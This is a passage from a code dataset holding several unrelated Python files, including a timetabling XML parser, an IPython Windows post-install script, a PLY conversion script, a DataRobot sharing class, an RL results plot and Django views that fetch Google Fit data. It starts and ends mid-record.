> 0:\n        minuteResult['average_delivery_time'] = (avg / numberOfEvents)\n        minuteResult['average_words_translated'] = (avgWords / numberOfEvents)\n        minuteResult['average_words_per_second'] = (avgWords / avg)\n\n    return minuteResult\n\n\ndef buildOutputList(events, windowSize):\n    # Get first minute to show\n    firstMinute = getFirstMinute(events[0]['timestamp'])\n\n    # Get last minute to show\n    lastMinute = getLastMinute(\n        events[len(events) - 1]['timestamp'], windowSize)\n\n    # Build output list\n    outputList = getOutputList(firstMinute, lastMinute)\n    return outputList\n\n\ndef getOutputList(firstMinute, lastMinute):\n    outputList = []\n    index = 0\n\n    while lastMinute >= firstMinute:\n        outputList.insert(\n            index, {'date': firstMinute, 'average_delivery_time': 0.0, 'average_words_translated': 0.0, 'average_words_per_second': 0.0})\n        firstMinute = firstMinute + timedelta(0, 60)\n        index = index + 1\n\n    return outputList\n\n\ndef getFirstMinute(timeStamp):\n    datetimeObject = datetime.strptime(timeStamp, '%Y-%m-%d %H:%M:%S.%f')\n    datetimeObject = datetimeObject.replace(second=0, microsecond=0)\n    return datetimeObject\n\n\ndef getLastMinute(timeStamp, windowSize):\n    datetimeObject = datetime.strptime(timeStamp, '%Y-%m-%d %H:%M:%S.%f')\n    datetimeObject = datetimeObject.replace(second=0, microsecond=0)\n    datetimeObject = datetimeObject + timedelta(0, 60 * windowSize)\n    return datetimeObject\n","sub_path":"business.py","file_name":"business.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"654060134","text":"from xml import sax\nimport logging\nimport argparse\n\nclass Time:\n\n    def __init__(self, weeks_str, days_str, start, length):\n        self.weeks = set()\n        for i, c in enumerate(weeks_str):\n            if c == '1':\n                self.weeks.add(i)\n        self.days = set()\n        for i, c in enumerate(days_str):\n            if c == '1':\n                self.days.add(i)\n        self.start = start\n        self.length = length\n\n    def intersects(self, other):\n        if self.weeks.isdisjoint(other.weeks):\n            return False\n        if self.days.isdisjoint(other.days):\n            return False\n        if self.start + self.length <= other.start:\n            return False\n        if other.start + other.length <= self.start:\n            return False\n        return True\n\n    def __str__(self):\n        return 
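business.py above emits one result row per minute, from the first event's minute up to the last event's minute plus windowSize, each averaging the trailing window; a self-contained sketch of that bookkeeping with two hypothetical events:

from datetime import datetime, timedelta

fmt = '%Y-%m-%d %H:%M:%S.%f'
events = [
    {'timestamp': '2018-12-26 18:11:08.509654', 'duration': 20, 'nr_words': 30},
    {'timestamp': '2018-12-26 18:15:19.903159', 'duration': 31, 'nr_words': 50},
]
window = 10  # minutes

first = datetime.strptime(events[0]['timestamp'], fmt).replace(second=0, microsecond=0)
last = datetime.strptime(events[-1]['timestamp'], fmt).replace(
    second=0, microsecond=0) + timedelta(minutes=window)
print(first, '->', last)  # one output row per minute from 18:11 to 18:25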
f'In the weeks {self.weeks}, the days {self.days}, in the time slots {self.start}-{self.start+self.length-1}.'\n\n# this maps a frozenset of rooms to a number, the distance between these rooms in time slots\nroom_distances = dict()\n\n# maps an id to a Room object\nroom_by_id = dict()\nclass Room:\n\n def __init__(self, room_id):\n self.id = room_id\n self.unavailable_times = []\n\n def add_unavailable(self, time_location):\n self.unavailable_times.append(time_location)\n\n def __str__(self):\n if not self.unavailable_times:\n return f'Room {self.id} is always available.\\n'\n s = f'Room {self.id} is unavailable:\\n'\n for time_location in self.unavailable_times:\n s += f'{time_location}\\n'\n return s\n\n'''\n A uclass represents a university class.\n'''\nuclass_by_id = dict()\nclass Uclass:\n\n def __init__(self, uclass_id):\n self.id = uclass_id\n\n self.times = dict()\n self.chosen_time = None\n\n self.rooms = dict()\n self.chosen_room = None\n\n '''\n The following dictionary maps a string like 'NotOverlap' or 'SameAttendees' to a dictionary.\n This dictionary maps a uclass to a penalty. This penalty is an integer or float('inf'). Infinity is used to\n indicate that a constraint must be met in a feasible solution.\n '''\n self.distributions = dict()\n\n def add_time(self, time_location, penalty):\n self.times[time_location] = penalty\n\n def add_room(self, room, penalty):\n self.rooms[room] = penalty\n\n def add_constraint(self, distribution_type, distribution_penalty, other_uclass):\n if distribution_type not in self.distributions:\n self.distributions[distribution_type] = dict()\n if other_uclass not in self.distributions[distribution_type]:\n self.distributions[distribution_type][other_uclass] = 0\n self.distributions[distribution_type][other_uclass] += distribution_penalty\n\n def __str__(self):\n s = f'Class {self.id} has {len(self.times)} possible times, {len(self.rooms)} possible rooms'\n s += f' and {len(self.distributions)} different constraint types:\\n'\n for room, penalty in self.rooms.items():\n s += f'Room {room.id} has penalty {penalty}.\\n'\n for time_location, penalty in self.times.items():\n s += f'{time_location} This time has penalty {penalty}.\\n'\n for distribution_name, specific_constraints in self.distributions.items():\n s += f'Distribution of type \"{distribution_name}\":\\n'\n for uclass, penalty in specific_constraints.items():\n s += f'Violation of this distribution with class {uclass.id} leads to a penalty of {penalty}.\\n'\n return s\n\nclass TimetablingHandler(sax.ContentHandler):\n\n def __init__(self):\n '''\n Indicates an important node up the branch, where we are in the XML tree at the moment. 
This context allows us\n        to distinguish, for example, the two occurrences of the 'room' element when it is being described itself,\n        versus when it is used to describe a class.\n\n        Takes values in ['rooms', 'subpart', None].\n        '''\n        self.section = None\n        self.current_room = None\n        self.current_uclass = None\n\n        self.distribution_type = None\n        self.distribution_penalty = None\n        self.distribution_uclasses = None\n\n    def startElement(self, tag, attributes):\n        # parse the rooms\n        if tag == 'rooms':\n            self.section = tag\n        elif tag == 'room' and self.section == 'rooms':\n            room_id = int(attributes['id'])\n            self.current_room = Room(room_id)\n            room_by_id[room_id] = self.current_room\n        elif tag == 'unavailable' and self.current_room is not None:\n            weeks = attributes['weeks']\n            days = attributes['days']\n            start = int(attributes['start'])\n            length = int(attributes['length'])\n            time_location = Time(weeks, days, start, length)\n            self.current_room.add_unavailable(time_location)\n        elif tag == 'travel' and self.current_room is not None:\n            other_room_id = int(attributes['room'])\n            both_room_ids = frozenset([self.current_room.id, other_room_id])\n            distance = int(attributes['value'])\n            room_distances[both_room_ids] = distance\n\n        # parse the classes\n        elif tag == 'subpart':\n            self.section = tag\n        elif tag == 'class' and self.section == 'subpart':\n            uclass_id = int(attributes['id'])\n            self.current_uclass = Uclass(uclass_id)\n            uclass_by_id[uclass_id] = self.current_uclass\n        elif tag == 'room' and self.current_uclass is not None:\n            penalty = int(attributes['penalty'])\n            room_id = int(attributes['id'])\n            room = room_by_id[room_id]\n            self.current_uclass.add_room(room, penalty)\n        elif tag == 'time' and self.current_uclass is not None:\n            penalty = int(attributes['penalty'])\n            weeks = attributes['weeks']\n            days = attributes['days']\n            start = int(attributes['start'])\n            length = int(attributes['length'])\n            time_location = Time(weeks, days, start, length)\n            self.current_uclass.add_time(time_location, penalty)\n\n        # parse the distributions\n        elif tag == 'distributions':\n            self.section = tag\n        elif tag == 'distribution':\n            self.distribution_type = attributes['type']\n            self.distribution_penalty = int(attributes['penalty']) if 'penalty' in attributes else float('inf')\n            self.distribution_uclasses = []\n        elif tag == 'class' and self.distribution_uclasses is not None:\n            uclass_id = int(attributes['id'])\n            uclass = uclass_by_id[uclass_id]\n            self.distribution_uclasses.append(uclass)\n\n    def endElement(self, tag):\n        if tag == 'rooms':\n            self.section = None\n        elif tag == 'room':\n            self.current_room = None\n        elif tag == 'subpart':\n            self.section = None\n        elif tag == 'class' and self.current_uclass is not None:\n            self.current_uclass = None\n        elif tag == 'distributions':\n            self.section = None\n        elif tag == 'distribution':\n            for uclass in self.distribution_uclasses:\n                for other_uclass in self.distribution_uclasses:\n                    if other_uclass == uclass: continue\n                    uclass.add_constraint(self.distribution_type, self.distribution_penalty, other_uclass)\n            self.distribution_type = None\n            self.distribution_penalty = None\n            self.distribution_uclasses = None\n\ndef check_constraints(assigned_ids, uclass, time_location):\n    for uclass_id in assigned_ids:\n        other_uclass = uclass_by_id[uclass_id]\n        same_rooms = other_uclass.chosen_room is not None and uclass.chosen_room is not None and other_uclass.chosen_room == uclass.chosen_room\n        times_intersect = other_uclass.chosen_time.intersects(time_location)\n        if same_rooms and times_intersect:\n            return False\n    return 
True\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--verbose', '-v', action='count')\n args = parser.parse_args()\n log_levels = {\n None: logging.WARNING,\n 1: logging.INFO,\n 2: logging.DEBUG\n }\n logging.basicConfig(format='%(message)s', level=log_levels[args.verbose])\n\n parser = sax.make_parser()\n parser.setContentHandler(TimetablingHandler())\n parser.parse('instances/bet-sum18.xml')\n\n logging.debug(f'I found the rooms:\\n')\n for room_id, room in room_by_id.items():\n logging.debug(f'{room}')\n\n logging.debug(f'The room distances are:\\n')\n for two_rooms, distance in room_distances.items():\n logging.debug(f'Rooms {two_rooms} have distance {distance}\\n')\n\n logging.debug('The classes are:')\n for uclass_id, uclass in uclass_by_id.items():\n logging.debug(uclass)\n\n assigned_ids = []\n for uclass_id, uclass in uclass_by_id.items():\n\n possible_rooms = uclass.rooms if uclass.rooms else [None]\n for room in possible_rooms:\n is_consistent = False\n uclass.chosen_room = room\n for time_location in uclass.times:\n is_consistent = check_constraints(assigned_ids, uclass, time_location)\n if is_consistent:\n uclass.chosen_time = time_location\n break\n if is_consistent:\n break\n\n if not is_consistent:\n logging.debug(f'Given prior allocations, class {uclass_id} cannot be allocated.')\n logging.debug(f'Prior allocations are:')\n for uclass_id in assigned_ids:\n uclass = uclass_by_id[uclass_id]\n if uclass.chosen_room is not None:\n logging.debug(f'Class {uclass_id} is assigned room {uclass.chosen_room.id}')\n if uclass.chosen_time is not None:\n logging.debug(f'Class {uclass_id} is assigned time: {uclass.chosen_time}')\n exit(1)\n assigned_ids.append(uclass_id)\n\n logging.debug('The assignments are:')\n for uclass_id, uclass in uclass_by_id.items():\n if uclass.chosen_room is not None:\n logging.debug(f'Class {uclass_id} is assigned room {uclass.chosen_room.id}')\n if uclass.chosen_time is not None:\n logging.debug(f'Class {uclass_id} is assigned time: {uclass.chosen_time}')\n","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":9985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"602519621","text":"#!python\n\"\"\"Distutils post installation script for Windows.\n\nhttp://docs.python.org/2/distutils/builtdist.html#the-postinstallation-script\n\n\"\"\"\n\n\nimport os\nimport sys\nimport shutil\n\ntry:\n import setuptools\n have_setuptools = True\nexcept ImportError:\n have_setuptools = False\n\n\npjoin = os.path.join\n\n# suffix for start menu folder names\npyver = \"(Py%i.%i %i bit)\" % (sys.version_info[0], sys.version_info[1],\n (32, 64)[sys.maxsize > 2**32])\n\n\ndef mkshortcut(target, description, linkdir, arguments=\"\", iconpath='',\n workdir=\"%HOMEDRIVE%%HOMEPATH%\", iconindex=0):\n \"\"\"Make a shortcut if it doesn't exist and register its creation.\"\"\"\n filename = pjoin(linkdir, description + '.lnk')\n description = \"%s %s\" % (description, pyver)\n create_shortcut(target, description, filename, arguments, workdir,\n iconpath, iconindex)\n file_created(filename)\n\n\ndef arguments(scriptsdir, script, scriptargs=''):\n \"\"\"Return command line arguments to be passed to the python executable.\"\"\"\n cmdbase = suffix(pjoin(scriptsdir, script))\n if have_setuptools:\n cmdbase += '-script.py'\n return '\"%s\" %s' % (cmdbase, scriptargs)\n\n\ndef suffix(s):\n \"\"\"Add '3' suffix to programs for Python 3.\"\"\"\n if sys.version_info[0] == 
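A small sketch of the Time.intersects semantics in parse.py above, assuming the Time class is importable: two meetings clash only when they share at least one week, at least one day, and an overlapping slot range. The bitmask strings are illustrative:

a = Time('11', '10000', start=10, length=4)  # weeks 0-1, day 0, slots 10-13
b = Time('01', '10000', start=12, length=4)  # week 1 only, day 0, slots 12-15
c = Time('11', '01000', start=10, length=4)  # same slots, but day 1

print(a.intersects(b))  # True: shared week 1, day 0, slots 12-13
print(a.intersects(c))  # False: the day sets are disjoint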
3:\n        s = s + '3'\n    return s\n\n\ndef install():\n    \"\"\"Routine to be run by the win32 installer with the -install switch.\"\"\"\n    # Get some system constants\n    python = pjoin(sys.prefix, 'python.exe')\n    pythonw = pjoin(sys.prefix, 'pythonw.exe')\n\n    if not have_setuptools:\n        # This currently doesn't work without setuptools,\n        # so don't bother making broken links\n        print(\"Setuptools is required to\"\n              \" create Start Menu items.\", file=sys.stderr)\n        print(\"Re-run this installer after installing\"\n              \" Setuptools to get Start Menu items.\", file=sys.stderr)\n        return\n\n    # Lookup path to common startmenu ...\n    ip_start_menu = pjoin(get_special_folder_path('CSIDL_COMMON_PROGRAMS'),\n                          'IPython %s' % pyver)\n\n    # Create IPython entry ...\n    if not os.path.isdir(ip_start_menu):\n        os.mkdir(ip_start_menu)\n        directory_created(ip_start_menu)\n\n    # Create .py and .bat files to make things available from\n    # the Windows command line. Thanks to the Twisted project\n    # for this logic!\n    programs = [\n        'ipython',\n        'iptest',\n    ]\n    programs = [suffix(p) for p in programs]\n    scripts = pjoin(sys.prefix, 'scripts')\n    if not have_setuptools:\n        # only create .bat files if we don't have setuptools\n        for program in programs:\n            raw = pjoin(scripts, program)\n            bat = raw + '.bat'\n            py = raw + '.py'\n            # Create .py versions of the scripts\n            shutil.copy(raw, py)\n            # Create .bat files for each of the scripts\n            bat_file = open(bat, 'w')  # 'file' is Python 2 only; the rest of this script targets Python 3\n            bat_file.write(\"@%s %s %%*\" % (python, py))\n            bat_file.close()\n\n    # Create Start Menu shortcuts\n    iconpath = pjoin(scripts, 'ipython.ico')\n    mkshortcut(python, 'IPython', ip_start_menu,\n               arguments(scripts, 'ipython'), iconpath)\n    mkshortcut(python, 'IPython (pylab mode)', ip_start_menu,\n               arguments(scripts, 'ipython', '--pylab'), iconpath)\n\n    iconpath = pjoin(scripts, 'ipython_nb.ico')\n    mkshortcut(python, 'IPython Notebook', ip_start_menu,\n               arguments(scripts, 'ipython', 'notebook'), iconpath)\n\n    mkshortcut(pythonw, 'IPython Documentation', ip_start_menu,\n               '-m webbrowser -t \"http://ipython.org/documentation.html',\n               iconpath='url.dll')\n\n    # Disable pysh Start item until the profile restores functionality\n    # Most of this code is in IPython/deathrow, and needs to be updated\n    # to 0.11 APIs\n    #mkshortcut(python, 'IPython%s (command prompt mode)', ip_start_menu,\n    #           arguments(scripts, 'ipython', 'profile=pysh --init'))\n\n\ndef remove():\n    \"\"\"Routine to be run by the win32 installer with the -remove switch.\"\"\"\n    pass\n\n\n# main()\nif len(sys.argv) > 1:\n    if sys.argv[1] == '-install':\n        try:\n            install()\n        except OSError:\n            print(\"Failed to create Start Menu items, try running the\"\n                  \" installer as administrator.\", file=sys.stderr)\n    elif sys.argv[1] == '-remove':\n        remove()\n    else:\n        print(\"Script was called with option %s\" % sys.argv[1],\n              file=sys.stderr)\n","sub_path":"scripts/ipython_win_post_install.py","file_name":"ipython_win_post_install.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"553170786","text":"import os\n#from shutil import copyfile\n#from pathlib import Path\n\ndef createFolder(directory):\n    try:\n        if not os.path.exists(directory):\n            os.makedirs(directory)\n    except OSError:\n        print('Error: Creating directory. 
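Note that create_shortcut, file_created, directory_created and get_special_folder_path in the installer script above are never imported: they are builtins injected by the bdist_wininst post-install runtime described in the docstring's distutils link. A hedged stub for exercising the script outside that runtime:

# Defined only when run by the Windows installer; stub them out otherwise.
try:
    create_shortcut  # noqa: F821 - injected by bdist_wininst
except NameError:
    def create_shortcut(*args):
        print('create_shortcut%r (no-op outside the installer)' % (args,))

    def file_created(path):
        print('file_created(%r) (no-op outside the installer)' % path)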
' + directory)\n\ndef getListOfFiles(dirName):\n    # Create a list of file and sub-directory\n    # names in the given directory\n    listOfFile = os.listdir(dirName)\n    allFiles = list()\n    # Iterate over all the entries\n    for entry in listOfFile:\n        # Create full path\n        fullPath = os.path.join(dirName, entry)\n        # If entry is a directory then get the list of files in this directory \n        if os.path.isdir(fullPath):\n            allFiles = allFiles + getListOfFiles(fullPath)\n        else:\n            allFiles.append(fullPath)\n    \n    return allFiles \n\n\nnormalfolderpath = '/home/misumi/Desktop/PCLDevelopment_ConversionTool/Data/MisumiData/Cantilever/PLY'\ndatafolderpath = '/home/misumi/Desktop/PCLDevelopment_ConversionTool/Data/MisumiData/Cantilever/uData/'\n\n # Get all file and folder names under the source directory\ntextfilenames = getListOfFiles(normalfolderpath) \n\nfor f in textfilenames: #loop through all the files and folders\n    if \".ply\" in f:\n        getbasepath = os.path.split(f)\n        basename = getbasepath[0]\n        foldername = os.path.split(basename)\n        datadestinationpath = datafolderpath + foldername[1] +'/'+ os.path.split(os.path.splitext(f)[0])[1]+ \".ply\"\n        \n        createfolder = os.path.join(datafolderpath,foldername[1])\n        createFolder(createfolder)\n        \n        file = open(f, \"r+\")\n        # print(file)\n        lines = [line.rstrip() for line in file]\n        # skipinfo = lines[10:]\n        filedata = open(datadestinationpath, \"w\")\n        # NOTE: 'head' is assembled but never written; the original first 10 header lines are copied below instead.\n        head = \"ply\\nformat ascii 1.0\\ncomment VCGLIB generated\\nelement vertex 2048\" + \"\\nproperty float x\\nproperty float y\\nproperty float z\\nelement face 0\\nproperty list uchar int vertex_indices\\nend_header\\n\"\n        \n        for i in lines[:10]:\n            filedata.write(i + '\\n')\n        \n        for i in lines[10:]:\n            firstline = i.split(' ')[0:3]\n            firstline = ','.join(firstline)\n            # file.seek(0)\n            \n            filedata.write(firstline.replace(',',' ') + '\\n')\n        \n        filedata.close() \n        file.close()\n        \n    ","sub_path":"PCL_DataConversion/makedata.py","file_name":"makedata.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"430647267","text":"import trafaret as t\n\nfrom datarobot.models.api_object import APIObject\n\nfrom ..utils import encode_utf8_if_py2\n\n\nclass SharingAccess(APIObject):\n    \"\"\" Represents metadata about whom an entity (e.g. a data store) has been shared with\n\n    .. versionadded:: v2.14\n\n    Currently :py:class:`DataStores `,\n    :py:class:`DataSources `,\n    :py:class:`Projects ` (new in version v2.15) and\n    :py:class:`CalendarFiles ` (new in version 2.15) can be shared.\n\n    This class can represent either access that has already been granted, or be used to grant access\n    to additional users.\n\n    Attributes\n    ----------\n    username : str\n        a particular user\n    role : str or None\n        if a string, represents a particular level of access and should be one of\n        ``datarobot.enums.SHARING_ROLE``. For more information on the specific access levels, see\n        the :ref:`sharing ` documentation. If None, can be passed to a `share`\n        function to revoke access for a specific user.\n    can_share : bool or None\n        if a bool, indicates whether this user is permitted to further share. When False, the\n        user has access to the entity, but can only revoke their own access, not modify any\n        user's access role. When True, the user can share with any other user at an access role up\n        to their own. 
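The recursive getListOfFiles in makedata.py above is equivalent to flattening os.walk; a self-contained cross-check (the two differ only in traversal order):

import os

def list_files_walk(dir_name):
    # Same file set as getListOfFiles above; os.walk handles the recursion.
    return [os.path.join(root, name)
            for root, _dirs, files in os.walk(dir_name)
            for name in files]

# sorted(list_files_walk(d)) == sorted(getListOfFiles(d)) for any directory d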
May be None if the SharingAccess was not retrieved from the DataRobot server\n but intended to be passed into a `share` function; this will be equivalent to passing True.\n user_id : str\n the id of the user\n \"\"\"\n\n _converter = t.Dict(\n {\n t.Key(\"username\"): t.String,\n t.Key(\"role\"): t.String,\n t.Key(\"can_share\", default=None): t.Or(t.Bool, t.Null),\n t.Key(\"user_id\", default=None): t.Or(t.String, t.Null),\n }\n ).ignore_extra(\"*\")\n\n def __init__(self, username, role, can_share=None, user_id=None):\n self.username = username\n self.role = role\n self.can_share = can_share\n self.user_id = user_id\n\n def __repr__(self):\n return encode_utf8_if_py2(\n (\n \"{cls}(username: {username}, role: {role}, \"\n \"can_share: {can_share}, user_id: {user_id})\"\n ).format(\n cls=self.__class__.__name__,\n username=self.username,\n role=self.role,\n can_share=self.can_share,\n user_id=self.user_id,\n )\n )\n\n def collect_payload(self):\n \"\"\" Set up the dict that should be sent to the server in order to share this\n\n Returns\n -------\n payload : dict\n \"\"\"\n payload = {\"username\": self.username, \"role\": self.role}\n if self.can_share is not None:\n payload[\"can_share\"] = self.can_share\n return payload\n","sub_path":"datarobot/models/sharing.py","file_name":"sharing.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"225262250","text":"import numpy as np\nimport pandas as pd\nimport os\nimport scipy\nfrom scipy import signal\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nmatplotlib.use(\"pgf\")\nplt.rcParams.update({\n \"pgf.texsystem\": \"pdflatex\",\n \"font.family\": \"serif\",\n \"font.size\": 6,\n \"legend.fontsize\": 5,\n \"text.usetex\": True,\n \"pgf.rcfonts\": False\n});\n\nplt.figure(figsize=(2.65, 1.5))\ndata_path = \"data/multi_walker/\"\n\n\ndf = pd.read_csv(os.path.join(data_path,'sa_ddpg.csv'))\ndf = df[['episodes_total', \"episode_reward_mean\"]]\ndata = df.to_numpy()\nplt.plot(data[:, 0], data[:, 1], '--', label='DDPG (Independent)', linewidth=0.6, linestyle=(0, (5, 2, 1, 2)))\n\n\ndf = pd.read_csv(os.path.join(data_path,'ddpg_5.csv'))\ndf = df[['episodes_total', \"episode_reward_mean\"]]\ndata = df.to_numpy()\nplt.plot(data[:, 0], data[:, 1], '--', label='DDPG (Shared)', linewidth=0.6, linestyle=(0, (1, 1)))\n\ndf = pd.read_csv(os.path.join(data_path, 'maddpg.csv'))\ndf = df[['episode', \"reward\"]]\ndata = df.to_numpy()\nplt.plot(data[:, 0], data[:, 1], label='MADDPG', linewidth=0.6, color='grey', linestyle='solid')\n\nplt.xlabel('Episode', labelpad=1)\nplt.ylabel('Average Total Reward', labelpad=1)\nplt.title('Multiwalker')\nplt.xticks(ticks=[10000,20000,30000,40000,50000],labels=['10k','20k','30k','40k','50k'])\nplt.xlim(0, 60000)\nplt.yticks(ticks=[-150,-100,-50,0],labels=['-150','-100','-50','0'])\nplt.ylim(-190, 15)\nplt.tight_layout()\nplt.legend(loc='upper right', ncol=1, labelspacing=.2, columnspacing=.25, borderpad=.25, bbox_to_anchor=(1., 0.85))\n# plt.legend(loc='lower center', ncol=1, labelspacing=.2, columnspacing=.25, borderpad=.25, bbox_to_anchor=(0.5, -0.75))\nplt.margins(x=0)\nplt.savefig(\"DDPGMultiwalkerGraph_camera.pgf\", bbox_inches = 'tight',pad_inches = .025)\nplt.savefig(\"DDPGMultiwalkerGraph_camera.png\", bbox_inches = 'tight',pad_inches = .025, 
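A usage sketch for SharingAccess above; the 'EDITOR' role string is illustrative, since real code would pass a value from datarobot.enums.SHARING_ROLE as the docstring says:

access = SharingAccess('jane.doe@example.com', role='EDITOR', can_share=False)
print(access.collect_payload())
# {'username': 'jane.doe@example.com', 'role': 'EDITOR', 'can_share': False}

Because can_share defaults to None, collect_payload includes it only when it was set explicitly, which keeps revocation payloads minimal.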
dpi=600)\n","sub_path":"parametersharingmadrl/plot/plot_ddpg_maddpg_multiwalker.py","file_name":"plot_ddpg_maddpg_multiwalker.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"73439474","text":"from django.shortcuts import render\nimport json\nfrom .models import OauthCreds\n# Create your views here.\nfrom googleapiclient.discovery import build\nfrom django.shortcuts import render,redirect\nfrom datetime import datetime\nimport time\nimport google.oauth2.credentials\nimport google_auth_oauthlib.flow\nimport httplib2\nimport google_auth_httplib2\n# Create your views here.\n\ndef logout_google(request):\n\tfor i in OauthCreds.objects.all():\n\t\tif i.user == request.user:\n\t\t\ti.delete()\n\t\t\tbreak\n\treturn redirect('auth_display')\n\ndef calc_step(data):\n\tsteps = 0\n\tfor i in data['point']:\n\t\tsteps+=int(i['value'][0]['intVal'])\n\treturn steps\n\ndef calc_calorie(data):\n\tcalories = 0.0\n\tfor i in data['point']:\n\t\tcalories+=(i['value'][0]['fpVal'])\n\treturn int(calories)\n\ndef calc_distance(data):\n\tdistance = 0.0\n\tfor i in data['point']:\n\t\tdistance+=(i['value'][0]['fpVal'])\n\treturn int(distance)\n\ndef calc_height(data):\n\theight = 0\n\tfor i in data['point']:\n\t\theight = i['value'][0]['fpVal']\n\treturn int(height*100)\n\ndef calc_weight(data):\n\tweight = 0\n\tfor i in data['point']:\n\t\tweight = i['value'][0]['fpVal']\n\treturn int(weight)\n\ndef start(request):\n\tflag = False\n\tfor i in OauthCreds.objects.all():\n\t\tif i.user == request.user:\n\t\t\tflag = True\n\tcontext = {}\n\tif not flag:\n\t\tcontext = { 'signed_in' : False , 'auth_url':'http://127.0.0.1:8000/fit/oauth'}\n\telse:\n\t\tcontext = oauthCallback(request)\n\treturn render(request,'start.html',context)\ndef extra(request):\n\treturn render(request,'extra.html')\ndef get_data_set():\n\ttoday = datetime.today().date()\n\tnow = datetime.today()\n\tstart = int(time.mktime(today.timetuple())*1000000000)\n\tend = int(time.mktime(now.timetuple())*1000000000)\n\tdata_set = \"%s-%s\" % (start, end)\n\treturn data_set\n\ndef oauthCallback(request):\n\n\t#print(q)\n\tscopes = [\"https://www.googleapis.com/auth/contacts.readonly\",\n\t\"https://www.googleapis.com/auth/fitness.activity.read\",\n\t\"https://www.googleapis.com/auth/fitness.body.write\",\n\t\"https://www.googleapis.com/auth/fitness.location.write\" ,\n\t\"https://www.googleapis.com/auth/fitness.activity.write\"\n\t]\n\n\tflow = google_auth_oauthlib.flow.Flow.from_client_secrets_file(\n './credentials.json',\n scopes)\n\tflow.redirect_uri = 'http://127.0.0.1:8000/fit/oauth'\n\tisAuthorized = False\n\tfor i in OauthCreds.objects.all():\n\t\tif i.user == request.user:\n\t\t\tisAuthorized = True\n\tif not isAuthorized:\n\t\tq = request.GET\n\t\tif not q:\n\t\t\tauthorization_url, state = flow.authorization_url(\n\t \taccess_type='offline',\n\t \tinclude_granted_scopes='true')\n\t\t\treturn redirect(authorization_url)\n\n\t\telse:\n\t\t\tcode = request.GET['code']\n\t\t\tflow.fetch_token(code = code)\n\t\t\tcredentials = flow.credentials\n\n\t\t\tOauthCreds.objects.create(user = request.user,creds = credentials)\n\n\telse:\n\t\tprint(\"herelmao\",request.user.data.all()[0].user)\n\t\tprint(\"here\",request.user.data.all()[0].creds)\n\t\tcredentials = request.user.data.all()[0].creds\n\tdatasourceid_steps = \"derived:com.google.step_count.delta:com.google.android.gms:estimated_steps\"\n\tdatasourceid_calories = 
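The plotting script above hard-codes matplotlib's pgf backend, which needs a working pdflatex; a hedged fallback sketch so the same figures can still be rendered as PNG without LaTeX (the usetex keys in the rcParams.update call would need dropping as well):

import shutil
import matplotlib

if shutil.which('pdflatex') is None:
    # No LaTeX toolchain available: render with the default Agg backend.
    matplotlib.use('Agg')
    matplotlib.rcParams['text.usetex'] = False
else:
    matplotlib.use('pgf')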
\"derived:com.google.calories.expended:com.google.android.gms:platform_calories_expended\"\n\tdatasourceid_distance = \"derived:com.google.distance.delta:com.google.android.gms:merge_distance_delta\"\n\tdatasourceid_height = \"raw:com.google.height:com.google.android.apps.fitness:user_input\"\n\tdatasourceid_weight = \"raw:com.google.weight:com.google.android.apps.fitness:user_input\"\n\n\n\n\tdataset = get_data_set()\n\tdataset1 = '0-'+dataset.split('-')[1]\n\tif credentials.expired:\n\t\tcredentials.refresh(Request())\n\n\t#url = \"GET https://www.googleapis.com/fitness/v1/users/me/dataSources/%s/datasets/%s\"%(datasourceid,dataset)\n\tfitness_service = build('fitness', 'v1', credentials = credentials)\n\tsteps = fitness_service.users().dataSources().datasets().get(userId='me', dataSourceId=datasourceid_steps, datasetId = dataset).execute()\n\tcalories = fitness_service.users().dataSources().datasets().get(userId='me', dataSourceId=datasourceid_calories, datasetId = dataset).execute()\n\tdistance = fitness_service.users().dataSources().datasets().get(userId='me', dataSourceId=datasourceid_distance, datasetId = dataset).execute()\n\theight = fitness_service.users().dataSources().datasets().get(userId='me', dataSourceId=datasourceid_height, datasetId = dataset1).execute()\n\tweight = fitness_service.users().dataSources().datasets().get(userId='me', dataSourceId=datasourceid_weight, datasetId = dataset1).execute()\n\n\tsteps = calc_step(steps)\n\tcalories = calc_calorie(calories)\n\tdistance = calc_distance(distance)\n\theight = calc_height(height)\n\tweight = calc_weight(weight)\n\t\t#steps+= int(i['value'][0]['intVal'])\n\tres = {\"signed_in\" : True, \"step_count\" : steps, \"calories\":calories , \"distance\" : distance, \"height\" : height, \"weight\" : weight}\n\t\t#steps+= int(i['value'][0]['intVal'])\n\tif isAuthorized:\n\t\treturn res\n\telse:\n\t\treturn redirect('auth_display')\n\t\t#response.json()\n","sub_path":"fit_data/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"599020222","text":"import os\nimport random\n\ndata_dir = '../data'\ntrain_file = 'train_data'\ntest_file = 'test_data'\nnum_part = 4\n\ndef get_data(filename, is_shuffle=True):\n samples = []\n with open(filename, 'r') as f:\n for line in f:\n samples.append(line)\n if is_shuffle:\n random.shuffle(samples)\n return samples\n\ndef gen_data(filename, n, dimension):\n with open(filename,'w') as f:\n for _ in range(n):\n f.write(str(random.randint(0,1))+' ')\n f.write(' '.join([str(x)+':'+str(random.uniform(0,10)) \\\n for x in range(dimension)]) + '\\n')\ntrain_dir = os.path.join(data_dir, 'train')\ntest_dir = os.path.join(data_dir, 'test')\nmodel_dir = os.path.join(data_dir, 'models')\n\nif not os.path.isdir(train_dir):\n os.mkdir(train_dir)\nif not os.path.isdir(test_dir):\n os.mkdir(test_dir)\nif not os.path.isdir(model_dir):\n os.mkdir(model_dir)\n\nprint('generating train data...')\ngen_data(os.path.join(data_dir,train_file), 10000, 100)\nsamples = get_data(os.path.join(data_dir, 